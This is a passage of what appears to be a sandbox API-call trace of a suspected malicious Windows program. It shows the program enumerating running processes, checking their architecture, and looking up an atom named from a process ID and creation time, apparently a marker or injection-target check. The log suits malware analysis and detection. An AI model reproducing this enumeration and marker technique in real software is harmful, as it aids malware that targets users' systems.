	[0072.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7721d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0072.937] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.937] CloseHandle (hObject=0x224) returned 1
	[0072.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x728998, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0072.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0072.937] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.937] CloseHandle (hObject=0x224) returned 1
	[0072.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0072.937] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.937] CloseHandle (hObject=0x224) returned 1
	[0072.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.937] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0072.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.938] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0072.938] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.938] CloseHandle (hObject=0x224) returned 1
	[0072.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7721b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.938] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0072.938] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.938] CloseHandle (hObject=0x224) returned 1
	[0072.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.938] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0072.938] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.938] CloseHandle (hObject=0x224) returned 1
	[0072.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x728a98, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0072.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0072.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0072.939] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.939] CloseHandle (hObject=0x224) returned 1
	[0072.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x7288b8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0072.939] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.939] CloseHandle (hObject=0x224) returned 1
	[0072.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dc80, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0072.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0072.939] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.939] CloseHandle (hObject=0x224) returned 1
	[0072.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x7287f8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0072.939] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0072.939] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.939] CloseHandle (hObject=0x224) returned 1
	[0072.939] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72eab8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0072.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0072.940] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.940] CloseHandle (hObject=0x224) returned 1
	[0072.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x728a38, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0072.940] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.940] CloseHandle (hObject=0x224) returned 1
	[0072.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0072.940] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.940] CloseHandle (hObject=0x224) returned 1
	[0072.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0072.940] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.940] CloseHandle (hObject=0x224) returned 1
	[0072.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x7287f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0072.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0072.940] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.941] CloseHandle (hObject=0x224) returned 1
	[0072.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x728878, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0072.941] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.941] CloseHandle (hObject=0x224) returned 1
	[0072.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x7721b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0072.941] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.941] CloseHandle (hObject=0x224) returned 1
	[0072.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x772158, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0072.941] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.941] CloseHandle (hObject=0x224) returned 1
	[0072.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72e7c0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0072.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0072.941] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.941] CloseHandle (hObject=0x224) returned 1
	[0072.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x772158, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0072.941] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.942] CloseHandle (hObject=0x224) returned 1
	[0072.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x7721a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0072.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0072.942] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.942] CloseHandle (hObject=0x224) returned 1
	[0072.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x7287f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0072.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0072.942] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.942] CloseHandle (hObject=0x224) returned 1
	[0072.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0072.942] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.942] CloseHandle (hObject=0x224) returned 1
	[0072.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x728958, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0072.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0072.942] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.942] CloseHandle (hObject=0x224) returned 1
	[0072.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72ea18, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0072.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0072.943] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.943] CloseHandle (hObject=0x224) returned 1
	[0072.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72ea18, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0072.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0072.943] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.943] CloseHandle (hObject=0x224) returned 1
	[0072.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x772158, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0072.943] GetLastError () returned 0x5
	[0072.943] GetLastError () returned 0x5
	[0072.943] GetLastError () returned 0x5
	[0072.943] GetLastError () returned 0x5
	[0072.943] GetLastError () returned 0x5
	[0072.943] GetLastError () returned 0x5
	[0072.943] GetLastError () returned 0x5
	[0072.943] GetLastError () returned 0x5
	[0072.943] GetLastError () returned 0x5
	[0072.943] GetLastError () returned 0x5
	[0072.943] GetLastError () returned 0x5
	[0072.943] GetLastError () returned 0x5
	[0072.943] GetLastError () returned 0x5
	[0072.943] GetLastError () returned 0x5
	[0072.943] GetLastError () returned 0x5
	[0072.943] GetLastError () returned 0x5
	[0072.943] GetLastError () returned 0x5
	[0072.943] GetLastError () returned 0x5
	[0072.943] GetLastError () returned 0x5
	[0072.943] GetLastError () returned 0x5
	[0072.943] GetLastError () returned 0x5
	[0072.943] GetLastError () returned 0x5
	[0072.943] GetLastError () returned 0x5
	[0072.943] GetLastError () returned 0x5
	[0072.943] GetLastError () returned 0x5
	[0072.943] GetLastError () returned 0x5
	[0072.943] GetLastError () returned 0x5
	[0072.943] GetLastError () returned 0x5
	[0072.943] GetLastError () returned 0x5
	[0072.943] GetLastError () returned 0x5
	[0072.943] GetLastError () returned 0x5
	[0072.943] GetLastError () returned 0x5
	[0072.943] GetLastError () returned 0x5
	[0072.944] GetLastError () returned 0x5
	[0072.944] GetLastError () returned 0x5
	[0072.944] GetLastError () returned 0x5
	[0072.944] GetLastError () returned 0x5
	[0072.944] GetLastError () returned 0x5
	[0072.944] GetLastError () returned 0x5
	[0072.944] GetLastError () returned 0x5
	[0072.944] GetLastError () returned 0x5
	[0072.944] GetLastError () returned 0x5
	[0072.944] GetLastError () returned 0x5
	[0072.944] GetLastError () returned 0x5
	[0072.944] GetLastError () returned 0x5
	[0072.944] GetLastError () returned 0x5
	[0072.944] GetLastError () returned 0x5
	[0072.944] GetLastError () returned 0x5
	[0072.944] GetLastError () returned 0x5
	[0072.944] GetLastError () returned 0x5
	[0072.944] GetLastError () returned 0x5
	[0072.944] GetLastError () returned 0x5
	[0072.944] GetLastError () returned 0x5
	[0072.944] GetLastError () returned 0x5
	[0072.944] GetLastError () returned 0x5
	[0072.944] GetLastError () returned 0x5
	[0072.944] GetLastError () returned 0x5
	[0072.944] GetLastError () returned 0x5
	[0072.944] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.944] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0072.944] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0072.944] GetLastError () returned 0x5
	[0072.944] GetLastError () returned 0x5
	[0072.944] GetLastError () returned 0x5
	[0072.944] GetLastError () returned 0x5
	[0072.944] GetLastError () returned 0x5
	[0072.944] GetLastError () returned 0x5
	[0072.944] GetLastError () returned 0x5
	[0072.944] GetLastError () returned 0x5
	[0072.944] GetLastError () returned 0x5
	[0072.944] GetLastError () returned 0x5
	[0072.944] GetLastError () returned 0x5
	[0072.944] GetLastError () returned 0x5
	[0072.944] GetLastError () returned 0x5
	[0072.944] GetLastError () returned 0x5
	[0072.944] GetLastError () returned 0x5
	[0072.944] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.945] GetLastError () returned 0x5
	[0072.946] GetLastError () returned 0x5
	[0072.946] GetLastError () returned 0x5
	[0072.946] GetLastError () returned 0x5
	[0072.946] GetLastError () returned 0x5
	[0072.946] GetLastError () returned 0x5
	[0072.946] GetLastError () returned 0x5
	[0072.946] GetLastError () returned 0x5
	[0072.946] GetLastError () returned 0x5
	[0072.946] GetLastError () returned 0x5
	[0072.946] GetLastError () returned 0x5
	[0072.946] GetLastError () returned 0x5
	[0072.946] GetLastError () returned 0x5
	[0072.946] GetLastError () returned 0x5
	[0072.946] GetLastError () returned 0x5
	[0072.946] GetLastError () returned 0x5
	[0072.946] GetLastError () returned 0x5
	[0072.946] GetLastError () returned 0x5
	[0072.946] GetLastError () returned 0x5
	[0072.946] GetLastError () returned 0x5
	[0072.946] GetLastError () returned 0x5
	[0072.946] GetLastError () returned 0x5
	[0072.946] GetLastError () returned 0x5
	[0072.946] GetLastError () returned 0x5
	[0072.946] GetLastError () returned 0x5
	[0072.946] GetLastError () returned 0x5
	[0072.946] GetLastError () returned 0x5
	[0072.946] GetLastError () returned 0x5
	[0072.946] GetLastError () returned 0x5
	[0072.946] GetLastError () returned 0x5
	[0072.946] GetLastError () returned 0x5
	[0072.946] GetLastError () returned 0x5
	[0072.946] GetLastError () returned 0x5
	[0072.946] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.946] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0072.946] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0072.947] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0072.947] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0072.947] CloseHandle (hObject=0x224) returned 1
	[0072.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0072.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x772170, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0072.947] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.947] CloseHandle (hObject=0x224) returned 1
	[0072.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72e770, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0072.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0072.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0072.947] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.947] CloseHandle (hObject=0x224) returned 1
	[0072.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x7721a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0072.983] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16e08) returned 0xc0000004
	[0072.984] VirtualAlloc (lpAddress=0x0, dwSize=0x16f08, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0072.984] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16f08, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0072.985] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0072.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x7721a0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0072.986] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0072.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x7721d0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.986] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0072.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.986] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0072.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772218, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.986] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
